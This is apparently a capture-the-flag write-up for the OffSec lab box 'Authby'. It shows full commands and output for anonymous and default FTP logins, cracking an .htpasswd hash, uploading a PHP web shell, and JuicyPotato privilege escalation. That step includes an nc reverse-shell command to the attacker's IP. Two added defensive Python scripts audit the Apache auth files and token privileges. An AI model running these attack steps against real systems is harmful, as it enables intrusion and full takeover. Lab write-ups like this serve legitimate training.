# Authby

## Recon (Enumeration)

### Nmap

```
nmap 192.168.212.46  -sV -sC --min-rate 3000 -p- -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-25 00:22 EST
Nmap scan report for 192.168.212.46
Host is up (0.042s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE            VERSION
21/tcp   open  ftp                zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| total 9680
| ----------   1 root     root      5610496 Oct 18  2011 zFTPServer.exe
| ----------   1 root     root           25 Feb 10  2011 UninstallService.bat
| ----------   1 root     root      4284928 Oct 18  2011 Uninstall.exe
| ----------   1 root     root           17 Aug 13  2011 StopService.bat
| ----------   1 root     root           18 Aug 13  2011 StartService.bat
| ----------   1 root     root         8736 Nov 09  2011 Settings.ini
| dr-xr-xr-x   1 root     root          512 Nov 25 11:43 log
| ----------   1 root     root         2275 Aug 09  2011 LICENSE.htm
| ----------   1 root     root           23 Feb 10  2011 InstallService.bat
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 extensions
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 certificates
|_dr-xr-xr-x   1 root     root          512 Jan 23  2023 accounts
242/tcp  open  http               Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
| http-auth: 
| HTTP/1.1 401 Authorization Required\x0D
|_  Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
|_http-title: 401 Authorization Required
3145/tcp open  zftp-admin         zFTPServer admin
3389/tcp open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=LIVDA
| Not valid before: 2023-01-22T09:37:27
|_Not valid after:  2023-07-24T09:37:27
| rdp-ntlm-info: 
|   Target_Name: LIVDA
|   NetBIOS_Domain_Name: LIVDA
|   NetBIOS_Computer_Name: LIVDA
|   DNS_Domain_Name: LIVDA
|   DNS_Computer_Name: LIVDA
|   Product_Version: 6.0.6001
|_  System_Time: 2023-11-25T05:23:53+00:00
|_ssl-date: 2023-11-25T05:23:58+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

```

### FTP

```
ftp 192.168.246.46 21
Connected to 192.168.246.46.
220 zFTPServer v6.0, build 2011-10-17 14:25 ready.
Name (192.168.246.46:g0): anonymous
331 User name received, need password.
Password: 
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||2048|)
150 Opening connection for /bin/ls.
total 9680
----------   1 root     root      5610496 Oct 18  2011 zFTPServer.exe
----------   1 root     root           25 Feb 10  2011 UninstallService.bat
----------   1 root     root      4284928 Oct 18  2011 Uninstall.exe
----------   1 root     root           17 Aug 13  2011 StopService.bat
----------   1 root     root           18 Aug 13  2011 StartService.bat
----------   1 root     root         8736 Nov 09  2011 Settings.ini
dr-xr-xr-x   1 root     root          512 Nov 09 13:24 log
----------   1 root     root         2275 Aug 09  2011 LICENSE.htm
----------   1 root     root           23 Feb 10  2011 InstallService.bat
dr-xr-xr-x   1 root     root          512 Nov 08  2011 extensions
dr-xr-xr-x   1 root     root          512 Nov 08  2011 certificates
dr-xr-xr-x   1 root     root          512 Jan 23  2023 accounts
```

Found an open FTP server; anonymous credentials seem to work.

I've also found some interesting users.

```
ftp> cd accounts
250 CWD Command successful.
ftp> dir
229 Entering Extended Passive Mode (|||2050|)
150 Opening connection for /bin/ls.
total 4
dr-xr-xr-x   1 root     root          512 Jan 23  2023 backup
----------   1 root     root          764 Jan 23  2023 acc[Offsec].uac
----------   1 root     root         1032 Nov 09 13:25 acc[anonymous].uac
----------   1 root     root          926 Jan 23  2023 acc[admin].uac
226 Closing data connection.
```

So now we know there are probably `admin`, `offsec` and `anonymous` users available.

Let's try `admin:admin` to log into FTP!

```
ftp 192.168.246.46 21  
Connected to 192.168.246.46.
220 zFTPServer v6.0, build 2011-10-17 14:25 ready.
Name (192.168.246.46:g0): admin
331 User name received, need password.
Password: 
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||2078|)
150 Opening connection for /bin/ls.
total 3
-r--r--r--   1 root     root           76 Nov 08  2011 index.php
-r--r--r--   1 root     root           45 Nov 08  2011 .htpasswd
-r--r--r--   1 root     root          161 Nov 08  2011 .htaccess
226 Closing data connection.
ftp> more .htaccess
AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>
ftp> 
ftp> more .ht
.htaccess       .htpasswd
ftp> more .htpasswd
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
ftp> ls
ftp: No control connection for command
226 Closing data connection.
ftp> exit
```

Well, what do we have here! We're able to log in, and we've found some credentials to use.

I was able to run `john` on this hash and found the password `elite`.

```
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt  --format=md5crypt
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
elite            (?)     
1g 0:00:00:00 DONE (2023-11-24 22:48) 10.00g/s 253440p/s 253440c/s 253440C/s 191192..260989
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

```
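The `.htaccess` and `.htpasswd` files above are worth a second look from the defender's side, and the following is an added audit script (my own code, not from the writeup or from Apache). It assumes constructed copies of the two files exactly as the FTP session listed them. It flags two things: the `<Limit GET POST PUT>` block scopes `Require valid-user` to those methods only, so any other method reaches the directory unauthenticated (Apache's own documentation says access-control directives should not sit inside `<Limit>`); and `$apr1$` is Apache's salted-MD5 scheme with no work factor, which is why john cracked it instantly. The `apr1_crypt` function is a from-scratch implementation of the public md5crypt construction with the `$apr1$` magic, so the recovered password can be verified without john or `htpasswd`:

```python
"""Audit the .htaccess / .htpasswd pair pulled from the FTP share (constructed copies below).

Two things a defender checks in these files:
  1. <Limit GET POST PUT> scopes "Require valid-user" to those methods only; any other
     method (DELETE, OPTIONS, ...) reaches the directory without authentication.
  2. $apr1$ is Apache's salted-MD5 scheme: no work factor, so a wordlist run (john above)
     is fast. apr1_crypt below follows the public md5crypt algorithm with the "$apr1$" magic.
"""
import hashlib
import hmac
import re
from typing import Dict, List, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Constructed copies of the two files shown in the FTP session above.
HTACCESS = r"""AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>
"""
HTPASSWD = "offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0\n"


def to64(value: int, count: int) -> str:
    """md5crypt's own base-64: emit 6 bits at a time, least significant group first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_crypt(password: str, salt: str, magic: str = "$apr1$") -> str:
    """MD5-based crypt (the FreeBSD md5crypt construction) with Apache's $apr1$ magic."""
    pw, sl = password.encode(), salt[:8].encode()
    ctx = hashlib.md5(pw + magic.encode() + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    for remaining in range(len(pw), 0, -16):        # mix in MD5(pw+salt+pw), len(pw) bytes
        ctx.update(alt[:min(16, remaining)])
    i = len(pw)
    while i:                                         # per bit of len(pw): NUL or pw[0]
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                            # fixed 1000-round stretching
        ctx1 = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            ctx1.update(sl)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()
    groups = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    encoded = "".join(to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in groups)
    return f"{magic}{salt[:8]}${encoded}{to64(final[11], 2)}"


def classify_htpasswd_hash(stored: str) -> str:
    """Name the scheme of an .htpasswd entry; only bcrypt has a tunable work factor."""
    if stored[:4] in ("$2a$", "$2b$", "$2y$"):
        return "bcrypt"
    if stored.startswith("$apr1$"):
        return "apr1 (salted MD5, no work factor)"
    if stored.startswith("{SHA}"):
        return "sha1 (unsalted)"
    if len(stored) == 13:
        return "crypt (DES, 8-char limit)"
    return "plaintext or unknown"


def verify_htpasswd_entry(stored: str, candidate: str) -> bool:
    """Check a candidate password against an $apr1$ entry (other schemes return False)."""
    m = re.fullmatch(r"\$apr1\$([^$]{1,8})\$[./0-9A-Za-z]{22}", stored)
    if not m:
        return False
    return hmac.compare_digest(apr1_crypt(candidate, m.group(1)), stored)


def unprotected_methods(htaccess: str) -> Optional[List[str]]:
    """Methods a <Limit> block leaves outside the Require directive; None if no <Limit>.

    Apache treats a GET limit as covering HEAD as well, so HEAD is only reported when GET is
    missing from the list. The fix is to drop <Limit> (or use <LimitExcept>) around Require.
    """
    m = re.search(r"<Limit\s+([^>]+)>(.*?)</Limit>", htaccess, re.S | re.I)
    if not m or "require" not in m.group(2).lower():
        return None
    limited = {meth.upper() for meth in m.group(1).split()}
    if "GET" in limited:
        limited.add("HEAD")
    common = ["GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "PATCH", "PROPFIND"]
    return [meth for meth in common if meth not in limited]


def audit(htaccess: str, htpasswd: str) -> Dict[str, object]:
    """Summarise both findings for the given file contents."""
    users = {}
    for line in htpasswd.splitlines():
        if ":" in line:
            user, stored = line.split(":", 1)
            users[user] = classify_htpasswd_hash(stored.strip())
    return {"unprotected_methods": unprotected_methods(htaccess), "users": users}


if __name__ == "__main__":
    print(audit(HTACCESS, HTPASSWD))
    entry = HTPASSWD.split(":", 1)[1].strip()
    print("offsec:elite verifies:", verify_htpasswd_entry(entry, "elite"))
```

Running it prints the method list left outside the `<Limit>` block and the scheme of each user's hash; `verify_htpasswd_entry` returns `True` for `elite` against the stored `$apr1$` value, confirming john's result. The `hmac.compare_digest` call is there because a verifier like this belongs in an authentication path, where a plain string comparison leaks timing.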

Alrighty! Let's move on to initial access!

### Initial Access

You might have noticed there is a web server running on port 242.

<figure><img src="/files/2wK2ibQLPJBIZzesAXmT" alt=""><figcaption><p>Basic authentication on Webserver</p></figcaption></figure>

Let's try our newfound credentials here!

<figure><img src="/files/p4MdhSZ5Cmi1itrCpVKU" alt=""><figcaption><p>Quote to piss you off.</p></figcaption></figure>

Alrighty.

Remember our FTP server?

```
total 3
-r--r--r--   1 root     root           76 Nov 08  2011 index.php
-r--r--r--   1 root     root           45 Nov 08  2011 .htpasswd
-r--r--r--   1 root     root          161 Nov 08  2011 .htaccess
226 Closing data connection.
```

This is interesting; I know that this web server is running `Apache` + `php`.

Maybe we can upload a web shell?

```
ftp 192.168.212.46 21    
Connected to 192.168.212.46.
220 zFTPServer v6.0, build 2011-10-17 14:25 ready.
Name (192.168.212.46:g0): admin
331 User name received, need password.
Password: 
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put dradik2.php 
local: dradik2.php remote: dradik2.php
229 Entering Extended Passive Mode (|||2063|)
150 File status okay; about to open data connection.
100% |*************************************************|  7206       70.84 MiB/s    00:00 ETA
226 Closing data connection.
7206 bytes sent in 00:00 (285.87 KiB/s)
ftp> exit
221 Goodbye.
```

Yes We can!

<figure><img src="/files/ob918vG9zhXCdQeqpFNm" alt=""><figcaption></figcaption></figure>

Look How pretty this web shell is!

I was able to retrieve the user flag by navigating to the user account and reading the proof.txt.

I upgraded my web shell to a reverse shell and started probing the machine.

I spent wayyy too much time here but this is a Windows Server 2008 R1 with 0 patches applied.

### Privilege Escalation

I delved into various potato exploits.

Seems like Juicy Potato (x86) was the one that was going to help us escalate privileges.

I attempted MS13-053 but to no avail.

```
.\MS13-053.exe
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
------------------- taviso () cmpxchg8b com, programmeboy () gmail com ---

[+] NtQueryIntervalProfile () 77538AC8
[+] NtQuerySystemInformation () 77538BC8
[?] NtQuerySystemInformation() => \SystemRoot\system32\ntkrnlpa.exe () 8160A000
[+] Discovered a ret instruction at 8160B31E
[+] Allocated userspace PATHRECORD () 00860000
[+]   ->next  @ 00860000
[+]   ->prev  @ 42424242
[+]   ->flags @ 0
[+] Searching for an available stub address...
[+] Success, ExploitRecordExit () 0x4065ff40
[+]   ->next  @ 00000000
[+]   ->prev  @ 00000000
[+]   ->flags @ 1
[+] ExploitRecord () 0xe87020
[+]   ->next  @ 4065FF40
[+]   ->prev  @ 8170241C
[+]   ->flags @ 17
[+] Creating complex bezier path with 86000
[+] Begin CreateRoundRectRgn cycle
[+] Allocated 263 HRGN objects
[+] Flattening curves...
[!] No luck, run exploit again (it can take several attempts)
[+] Press any key to exit...

C:\wamp\www>.\MS13-053.exe
```

#### JuicyPotato

I figured I'd give this a try.

```
C:\wamp\www>.\Juicy.Potato.x86.exe
.\Juicy.Potato.x86.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user

C:\wamp\www>.\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
.\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
Testing {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} 1337
COM -> recv failed with error: 10038
```

Fail. Let's try another CLSID.

The following doc has a lot of handy CLSIDs.

{% embed url="https://ohpe.it/juicy-potato/CLSID/Windows_Server_2008_R2_Enterprise/" %}

So we find a suitable CLSID and test!

```
C:\wamp\www>.\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {752073A1-23F2-4396-85F0-8FDB879ED0ED}
.\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {752073A1-23F2-4396-85F0-8FDB879ED0ED}
Testing {752073A1-23F2-4396-85F0-8FDB879ED0ED} 1337
....
[+] authresult 0
{752073A1-23F2-4396-85F0-8FDB879ED0ED};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

C:\wamp\www>nc
nc
'nc' is not recognized as an internal or external command,
operable program or batch file.

C:\wamp\www>.\Juicy.Potato.x86.exe -l 1337 -c "{752073A1-23F2-4396-85F0-8FDB879ED0ED}" -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 192.168.45.215 12346" -t *
.\Juicy.Potato.x86.exe -l 1337 -c "{752073A1-23F2-4396-85F0-8FDB879ED0ED}" -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 192.168.45.215 12346" -t *
Testing {752073A1-23F2-4396-85F0-8FDB879ED0ED} 1337
....
[+] authresult 0
{752073A1-23F2-4396-85F0-8FDB879ED0ED};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
```

In the middle I check for nc. The machine didn't have it, so I had to upload it and then modify my payload to call for a reverse shell.

We catch the shell and we are now `nt authority\system`!

```
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>more proof.txt
more proof.txt
d935e8d5acb71070b29ad5266c11bcb4
```

GG!
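The JuicyPotato step above only works because the account the web shell runs under holds a token-impersonation privilege; that is the precondition a defender checks for, and it is what the `sedebug-+-seimpersonate-copy-token` link below is about. The following is an added check of my own (not from the writeup or any potato project) that parses `whoami /priv` output for the two privileges the potato family relies on. The sample output is constructed, not captured from this box:

```python
"""Flag the token privileges that make potato-family escalation possible.

JuicyPotato needs the calling account to hold SeImpersonatePrivilege (the
CreateProcessWithTokenW path, which succeeded above) or SeAssignPrimaryTokenPrivilege (the
CreateProcessAsUser path). Windows grants these to service accounts, which is why a web
shell running under the web server's account was enough. Feed parse/exposure the text of
`whoami /priv` from the account in question.
"""
from typing import Dict, List

# Privileges that let a process take another token and start a process with it.
TOKEN_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate a client token (CreateProcessWithTokenW path)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token (CreateProcessAsUser path)",
}

# Constructed `whoami /priv` output for a web server service account (not from the page).
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Map privilege name -> State column from `whoami /priv` output."""
    privs: Dict[str, str] = {}
    for line in text.splitlines():
        parts = line.split()
        # Privilege names are the Se...Privilege tokens; the last column is the state.
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[0].endswith("Privilege"):
            privs[parts[0]] = parts[-1]
    return privs


def potato_exposure(text: str) -> List[str]:
    """Return the token privileges the account holds that a potato exploit can use.

    The State column is deliberately ignored: a process can re-enable a Disabled privilege
    it holds, so only removing the privilege from the account (or running the service as a
    less privileged account) closes the path.
    """
    privs = parse_whoami_priv(text)
    return [name for name in TOKEN_PRIVILEGES if name in privs]


def describe(text: str) -> str:
    """One-line verdict suitable for a hardening report."""
    found = potato_exposure(text)
    if not found:
        return "no token-impersonation privileges: potato-style escalation not available"
    return "exposed via " + ", ".join(f"{p} ({TOKEN_PRIVILEGES[p]})" for p in found)


if __name__ == "__main__":
    print(describe(SAMPLE_WHOAMI_PRIV))
```

On a hardened host the answer should be the "no token-impersonation privileges" line for the web server's account; on this box, a web shell that can run JuicyPotato is proof the privilege was present, and the fix is the account choice plus patching, not a firewall rule on the COM listen port.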

### Helpful Links

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md" %}

{% embed url="https://github.com/antonioCoco/JuicyPotatoNG/releases" %}

{% embed url="https://jlajara.gitlab.io/Potatoes_Windows_Privesc#juicyPotato" %}

{% embed url="https://foxglovesecurity.com/2016/01/16/hot-potato/" %}

{% embed url="https://github.com/ohpe/juicy-potato" %}

{% embed url="https://hideandsec.sh/books/windows-sNL/page/in-the-potato-family-i-want-them-all" %}

{% embed url="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token" %}

{% embed url="https://github.com/ivanitlearning/Juicy-Potato-x86/releases" %}

{% embed url="https://ohpe.it/juicy-potato/CLSID/Windows_Server_2008_R2_Enterprise/" %}

